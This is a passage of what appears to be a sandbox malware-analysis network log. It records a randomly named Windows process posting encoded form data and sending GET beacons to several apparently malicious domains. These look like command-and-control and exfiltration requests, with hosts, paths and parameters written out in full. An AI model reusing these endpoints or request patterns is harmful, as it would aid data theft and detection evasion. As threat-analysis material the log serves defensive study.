Timestamp: Dec 9, 2024 08:44:23.989308119 CET | Bytes transferred: 73 | Direction: IN | Data:
HTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


Session ID: 15 | Source IP: 192.168.2.12 | Source Port: 49744 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 1344 | Process: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
Timestamp: Dec 9, 2024 08:44:25.575764894 CET | Bytes transferred: 1817 | Direction: OUT | Data:
POST /rxts/ HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lovel.shop
                                                                Referer: http://www.lovel.shop/rxts/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 65 53 52 2f 59 69 31 4b 4e 45 50 55 4e 74 35 38 6b 46 32 55 67 7a 46 6c 2f 68 50 79 4a 53 76 4d 31 4a 54 39 35 78 4f 53 4e 72 48 2b 78 49 39 6c 4e 7a 71 5a 73 59 54 50 37 5a 54 56 37 51 41 56 59 63 63 63 41 43 77 6a 69 47 70 68 2f 43 4f 41 66 58 50 50 59 47 64 6d 65 72 4e 66 52 2b 53 75 43 48 4b 53 35 65 30 73 65 4e 6f 31 42 4a 69 73 56 31 35 44 4a 38 4d 4c 6a 6b 2f 32 77 53 36 72 41 42 67 67 68 39 48 6f 75 2f 35 62 42 33 37 4e 2f 59 47 7a 44 61 65 49 4e 68 50 6d 52 30 33 42 6c 6b 6f 43 72 50 5a 6d 72 46 61 77 33 70 47 4c 44 46 5a 30 55 56 4b 6f 39 4f 45 55 37 4d 4e 56 78 63 78 43 73 53 50 6a 42 4c 48 6d 38 7a 5a 35 4c 4b 58 48 4a 79 4b 56 75 63 31 41 30 6e 44 32 47 66 47 51 4d 6c 63 63 48 39 6d 36 54 74 6f 72 65 6d 4d 49 73 42 62 4a 43 4d 4f 74 58 31 33 39 6f 33 6f 43 52 65 51 72 31 57 47 4a 6a 2f 65 52 76 41 46 77 4b 70 51 5a 37 41 2b 77 43 41 4c 33 39 61 [TRUNCATED]
                                                                Data Ascii: Ebfx6=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjeSR/Yi1KNEPUNt58kF2UgzFl/hPyJSvM1JT95xOSNrH+xI9lNzqZsYTP7ZTV7QAVYcccACwjiGph/COAfXPPYGdmerNfR+SuCHKS5e0seNo1BJisV15DJ8MLjk/2wS6rABggh9Hou/5bB37N/YGzDaeINhPmR03BlkoCrPZmrFaw3pGLDFZ0UVKo9OEU7MNVxcxCsSPjBLHm8zZ5LKXHJyKVuc1A0nD2GfGQMlccH9m6TtoremMIsBbJCMOtX139o3oCReQr1WGJj/eRvAFwKpQZ7A+wCAL39aVgbTPmX24yIGdNXVfG7t7VyaytoAtyJ0OlTe+6H4WwS/l+fI+63oQqa54R4o/eaUFpHhjISYxqNThyab8feZ6atOCJGIezcQLQifj9Xj6IBL1qg/b8oWu8o0doCa0OU41w8HXeb6gFHc/ZMgJtCA7KbN2G7BCfoPkTrDDfSKjALL3clIkCbkBtM6Bj8DY4NfQF2FoZeK/Pyfe/uRCqKfffcdbVL/L/8eN2VoF41h3bVBBYhTEErxXghI30zGYPxpzO/HP63bXwcnro56YRFW8LK+6VlOXsmtsn8JUlJKj//m915xLOjJ4Toyi380LKVLzK55KufJIH6xQvHwLjuxq1mie7iBzSDwR8rkgJBf2XDRYbBjPy5hs1for7qbIt+LXgIOHM1FGqERDccgVngN2qBI8ms49fG8/ge4Ce/aBH7hjNm2+xjDWAXPuRGNfLRIefc1e5DPA0BE5WYh/fOtpJRGNJ7IP0bRAackh8OYXfSWJ0YqrbzqXWQn2zrpSdGBbgOuROt/EHovNfeTp1holcYYh6tUYIovhyp+SEXhQrhGXaa/YLM3+WOzyc/8i3gS0vJLRlXl7PKk/s7bUzdje5shEXRE54whSiuzI1ulR2SvzIMwX2ErHMHDNxwWpXx98QW+BSZZZRFmpqUMeoY9xcf5U7Yt8vpBcc [TRUNCATED]
                                                                Dec 9, 2024 08:44:26.663047075 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                16 | 192.168.2.12 | 49745 | 13.248.169.48 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:28.234287024 CET | 530 | OUT | GET /rxts/?Ebfx6=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmG95haE2aMKVRHbzfzsbYvt06DCBrRY=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:44:30.346880913 CET | 381 | IN | HTTP/1.1 200 OK
                                                                content-type: text/html
                                                                date: Mon, 09 Dec 2024 07:44:30 GMT
                                                                content-length: 260
                                                                connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 62 66 78 36 3d 55 4d 71 64 33 52 72 2f 47 67 6a 63 70 44 74 4d 69 66 46 30 68 41 56 58 55 4c 77 75 67 47 79 61 4a 48 64 66 46 30 76 58 59 78 75 6f 59 38 4e 6d 77 63 52 4b 48 46 52 51 33 5a 63 35 32 32 67 6d 46 57 4c 6d 56 68 70 4f 72 35 46 6c 62 66 6b 72 4f 44 6c 6d 4c 2f 70 4d 6d 47 39 35 68 61 45 32 61 4d 4b 56 52 48 62 7a 66 7a 73 62 59 76 74 30 36 44 43 42 72 52 59 3d 26 4e 6a 6c 64 3d 4c 44 54 74 77 78 62 58 32 76 69 30 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ebfx6=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmG95haE2aMKVRHbzfzsbYvt06DCBrRY=&Njld=LDTtwxbX2vi0G"}</script></head></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                17 | 192.168.2.12 | 49747 | 3.33.130.190 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:35.938441992 CET | 796 | OUT | POST /zs4o/ HTTP/1.1
                                                                Host: www.duskgazes.work
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.duskgazes.work
                                                                Referer: http://www.duskgazes.work/zs4o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 31 32 61 50 55 74 61 38 66 6a 50 64 44 46 45 6d 58 6c 72 54 2f 68 51 33 43 75 35 52 49 78 71 57 4a 45 33 44 4a 55 49 2b 4e 78 70 30 6c 64 36 4d 58 66 6d 51 38 77 38 71 31 33 56 39 52 72 5a 4a 48 31 70 76 39 50 63 4b 63 4a 75 6a 70 50 64 75 77 63 35 4a 33 54 64 57 49 38 4e 32 31 76 6e 45 62 54 71 67 37 70 55 6c 43 33 68 4e 72 4b 58 4f 30 5a 41 63 32 6f 6c 47 68 6d 6e 6a 4b 53 65 78 74 77 6b 4a 51 52 33 77 53 6b 4a 58 65 70 33 59 51 71 37 55 6a 71 62 30 70 67 55 6e 72 6b 57 43 42 53 4a 59 46 74 52 41 4d 7a 34 68 4b 56 46 52 70 74 63 79 78 4d 43 34 55 78 32 48 69 4b 55 34 4e 41 3d 3d
                                                                Data Ascii: Ebfx6=12aPUta8fjPdDFEmXlrT/hQ3Cu5RIxqWJE3DJUI+Nxp0ld6MXfmQ8w8q13V9RrZJH1pv9PcKcJujpPduwc5J3TdWI8N21vnEbTqg7pUlC3hNrKXO0ZAc2olGhmnjKSextwkJQR3wSkJXep3YQq7Ujqb0pgUnrkWCBSJYFtRAMz4hKVFRptcyxMC4Ux2HiKU4NA==
                                                                Dec 9, 2024 08:44:37.076947927 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                18 | 192.168.2.12 | 49748 | 3.33.130.190 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:38.600310087 CET | 816 | OUT | POST /zs4o/ HTTP/1.1
                                                                Host: www.duskgazes.work
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.duskgazes.work
                                                                Referer: http://www.duskgazes.work/zs4o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 64 30 6b 2f 79 4d 57 65 6d 51 2f 77 38 71 2b 58 56 38 63 4c 5a 43 48 31 74 4a 39 4e 34 4b 63 4a 36 6a 70 4f 74 75 78 76 52 4b 30 6a 64 51 42 63 4e 77 6f 2f 6e 45 62 54 71 67 37 70 42 74 43 78 4a 4e 72 36 6e 4f 6d 74 63 62 6f 34 6c 46 32 57 6e 6a 63 69 65 31 74 77 6b 52 51 54 44 61 53 6e 78 58 65 70 6e 59 52 37 37 54 32 61 62 75 32 77 56 6f 37 58 4c 72 59 41 4e 74 43 76 52 68 46 7a 73 38 50 54 49 4c 32 66 55 6b 6b 50 57 31 5a 6d 50 33 76 4a 70 78 57 48 37 38 59 68 74 4f 73 68 6f 41 52 31 7a 55 6b 4d 6d 79 51 61 45 3d
                                                                Data Ascii: Ebfx6=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDd0k/yMWemQ/w8q+XV8cLZCH1tJ9N4KcJ6jpOtuxvRK0jdQBcNwo/nEbTqg7pBtCxJNr6nOmtcbo4lF2Wnjcie1twkRQTDaSnxXepnYR77T2abu2wVo7XLrYANtCvRhFzs8PTIL2fUkkPW1ZmP3vJpxWH78YhtOshoAR1zUkMmyQaE=
                                                                Dec 9, 2024 08:44:39.683572054 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                19 | 192.168.2.12 | 49749 | 3.33.130.190 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:41.295137882 CET | 1829 | OUT | POST /zs4o/ HTTP/1.1
                                                                Host: www.duskgazes.work
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.duskgazes.work
                                                                Referer: http://www.duskgazes.work/zs4o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 6c 30 6c 4d 71 4d 58 39 2b 51 2b 77 38 71 69 6e 56 35 63 4c 5a 6c 48 31 56 46 39 4e 45 67 63 4b 43 6a 6f 73 6c 75 67 75 52 4b 6a 54 64 51 44 63 4e 78 31 76 6d 47 62 54 36 6b 37 70 52 74 43 78 4a 4e 72 34 50 4f 6c 35 41 62 71 34 6c 47 68 6d 6e 76 4b 53 66 51 74 77 73 42 51 54 48 67 53 58 52 58 65 49 58 59 53 4a 54 54 30 36 62 77 31 77 55 33 37 58 48 77 59 42 68 58 43 75 56 48 46 78 38 38 4f 69 74 50 69 37 41 75 35 65 75 6c 64 78 4c 67 76 70 35 52 57 58 58 41 52 41 31 74 72 7a 55 52 4b 56 36 72 32 63 48 77 54 71 70 65 55 69 57 77 49 31 31 56 4f 4b 76 69 30 34 36 44 38 39 59 34 76 56 45 56 52 64 35 4d 55 62 36 42 30 66 58 79 37 6c 5a 6b 66 68 62 6e 56 42 2f 61 68 6a 6d 55 78 67 2f 54 63 5a 4c 55 43 6e 6b 75 33 5a 37 44 5a 52 58 4c 2b 6b 74 38 36 32 41 2f 68 4b 57 78 33 52 73 30 41 32 54 5a 4d 75 70 6c 36 6c 49 71 7a 45 44 7a 5a 51 4b 48 7a 71 58 32 72 4d 30 4c [TRUNCATED]
                                                                Data Ascii: Ebfx6= [TRUNCATED]
                                                                Dec 9, 2024 08:44:42.360424995 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                20 | 192.168.2.12 | 49750 | 3.33.130.190 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:43.956914902 CET | 534 | OUT | GET /zs4o/?Ebfx6=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWs9osNHqTA3jhptZMXJwhZ2LicMQ2+w=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.duskgazes.work
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:44:45.074815035 CET | 381 | IN | HTTP/1.1 200 OK
                                                                content-type: text/html
                                                                date: Mon, 09 Dec 2024 07:44:44 GMT
                                                                content-length: 260
                                                                connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 62 66 78 36 3d 34 30 79 76 58 5a 71 51 58 77 79 4f 46 54 6c 30 64 31 66 78 77 68 51 47 54 73 5a 6a 4b 43 43 33 4a 57 6a 48 4a 45 5a 38 49 42 5a 75 74 4f 2b 59 53 71 76 76 77 69 6f 68 31 52 42 56 52 4b 6c 4d 49 52 56 78 75 63 55 71 45 4d 57 67 72 2b 46 41 67 66 5a 59 6f 52 34 76 57 73 39 6f 73 4e 48 71 54 41 33 6a 68 70 74 5a 4d 58 4a 77 68 5a 32 4c 69 63 4d 51 32 2b 77 3d 26 4e 6a 6c 64 3d 4c 44 54 74 77 78 62 58 32 76 69 30 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ebfx6=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYoR4vWs9osNHqTA3jhptZMXJwhZ2LicMQ2+w=&Njld=LDTtwxbX2vi0G"}</script></head></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                21 | 192.168.2.12 | 49751 | 104.21.38.113 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:50.570185900 CET | 817 | OUT | POST /xyvr/ HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.zrinorem-srumimit.sbs
                                                                Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 76 32 59 49 31 67 38 65 57 56 43 77 38 43 6d 48 30 35 77 49 73 55 67 4e 42 76 56 5a 6d 5a 37 69 70 32 4b 2f 55 76 68 51 39 30 54 62 2b 68 31 68 70 30 34 32 78 4c 70 5a 30 75 43 4c 4d 77 66 75 79 44 39 2b 39 74 6a 50 6b 53 33 72 34 70 5a 59 69 59 55 72 6a 53 4e 6e 44 6d 6f 6f 30 77 6d 6b 65 2b 47 62 62 59 56 61 30 61 45 75 45 74 70 4a 53 50 33 44 73 51 52 64 79 44 44 6b 41 5a 70 79 4d 74 55 66 63 63 56 44 49 36 37 57 67 41 45 2f 65 34 71 72 51 74 74 51 45 54 64 42 32 5a 36 32 33 30 59 63 4d 69 6d 43 4c 75 6d 4b 55 6c 2b 37 50 33 5a 70 41 41 3d 3d
                                                                Data Ascii: Ebfx6=OmXQT89rv7odv2YI1g8eWVCw8CmH05wIsUgNBvVZmZ7ip2K/UvhQ90Tb+h1hp042xLpZ0uCLMwfuyD9+9tjPkS3r4pZYiYUrjSNnDmoo0wmke+GbbYVa0aEuEtpJSP3DsQRdyDDkAZpyMtUfccVDI67WgAE/e4qrQttQETdB2Z6230YcMimCLumKUl+7P3ZpAA==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                22 | 192.168.2.12 | 49752 | 104.21.38.113 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:53.228396893 CET | 837 | OUT | POST /xyvr/ HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.zrinorem-srumimit.sbs
                                                                Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 75 57 49 49 7a 48 6f 65 51 31 43 78 67 79 6d 48 74 70 77 55 73 55 73 4e 42 71 6b 45 6d 76 54 69 70 58 36 2f 58 75 68 51 7a 55 54 62 78 42 31 6b 74 30 35 36 78 4c 74 76 30 76 2b 4c 4d 77 4c 75 79 44 4e 2b 2b 61 50 4d 6c 43 33 70 77 4a 5a 61 39 49 55 72 6a 53 4e 6e 44 6c 56 44 30 30 4b 6b 66 4f 32 62 42 36 39 5a 33 61 45 70 53 64 70 4a 42 66 33 50 73 51 52 76 79 47 6a 4f 41 66 6c 79 4d 73 6b 66 66 4e 56 41 64 71 37 59 74 67 46 4f 4e 70 54 53 5a 64 35 51 46 43 70 32 2f 34 6d 41 79 79 56 47 54 51 75 55 65 74 79 48 5a 79 48 4c 43 30 6b 67 62 50 46 4e 6f 44 36 78 43 66 77 39 51 6d 49 49 57 45 74 44 45 78 6f 3d
                                                                Data Ascii: Ebfx6=OmXQT89rv7oduWIIzHoeQ1CxgymHtpwUsUsNBqkEmvTipX6/XuhQzUTbxB1kt056xLtv0v+LMwLuyDN++aPMlC3pwJZa9IUrjSNnDlVD00KkfO2bB69Z3aEpSdpJBf3PsQRvyGjOAflyMskffNVAdq7YtgFONpTSZd5QFCp2/4mAyyVGTQuUetyHZyHLC0kgbPFNoD6xCfw9QmIIWEtDExo=


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                23 | 192.168.2.12 | 49753 | 104.21.38.113 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:55.898485899 CET | 1850 | OUT | POST /xyvr/ HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.zrinorem-srumimit.sbs
                                                                Referer: http://www.zrinorem-srumimit.sbs/xyvr/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 4f 6d 58 51 54 38 39 72 76 37 6f 64 75 57 49 49 7a 48 6f 65 51 31 43 78 67 79 6d 48 74 70 77 55 73 55 73 4e 42 71 6b 45 6d 76 62 69 70 46 79 2f 56 4e 35 51 79 55 54 62 76 78 31 6c 74 30 34 67 78 50 41 6d 30 76 7a 30 4d 7a 7a 75 67 77 46 2b 70 62 50 4d 76 43 33 70 38 70 5a 58 69 59 55 79 6a 53 38 50 44 6c 46 44 30 30 4b 6b 66 4e 75 62 58 34 56 5a 37 36 45 75 45 74 70 73 53 50 33 72 73 54 68 56 79 47 76 30 48 76 46 79 4d 4d 30 66 50 76 74 41 41 61 37 4e 71 67 46 57 4e 6f 76 7a 5a 63 56 6d 46 43 63 68 2f 34 4f 41 2b 48 6f 67 55 78 4c 4f 4a 75 65 2f 63 6c 44 46 46 6e 63 42 58 59 4a 34 37 53 71 4a 4e 50 63 49 61 58 42 53 53 45 56 34 57 32 65 55 51 2f 47 48 33 71 5a 51 58 4e 4b 2b 59 78 4b 6d 63 61 70 51 49 61 48 38 4a 38 69 4c 73 6d 68 78 41 30 6e 50 52 2b 41 35 55 74 55 6d 6b 6b 54 67 57 44 59 69 6a 78 4c 62 44 2f 71 59 6c 34 49 6e 38 57 4f 32 47 56 38 35 5a 73 76 39 4b 63 48 67 4a 75 63 72 37 79 44 6e 39 48 4b 73 30 35 56 6c 65 5a 78 67 6e 2f 7a 46 36 4d 75 61 70 2f 41 36 64 54 75 33 [TRUNCATED]
                                                                Data Ascii: Ebfx6= [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                24 | 192.168.2.12 | 49754 | 104.21.38.113 | 80 | 1344 | C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Dec 9, 2024 08:44:58.556433916 CET | 541 | OUT | GET /xyvr/?Njld=LDTtwxbX2vi0G&Ebfx6=Dk/wQKBXq4hP/zVb9ApyZmDkyzbQqrM0hWgYI5VbiKGV4GeQY6os12Lf5EdpuHYA6f15h+K7XFjq1wIjorrCnH6ZrpZ66ZcdvUt/dXVK/m2TWNblWa9AhcM= HTTP/1.1
                                                                Host: www.zrinorem-srumimit.sbs
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:45:38.570445061 CET | 963 | IN | HTTP/1.1 522
                                                                Date: Mon, 09 Dec 2024 07:45:38 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 15
                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOzgbDF2o6luin1mtHQygCl82Qor7p3z5ye1WyDY0HuDTqnpEU5pjHURcuUuJhXO2GFhQ7c1WAWzCLp6eQNHUYdUbQlGf%2BBEepTbrsxYG3nbHWUcBsHWYBajycuu83%2BXdSl70KhcDO6KPAQE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
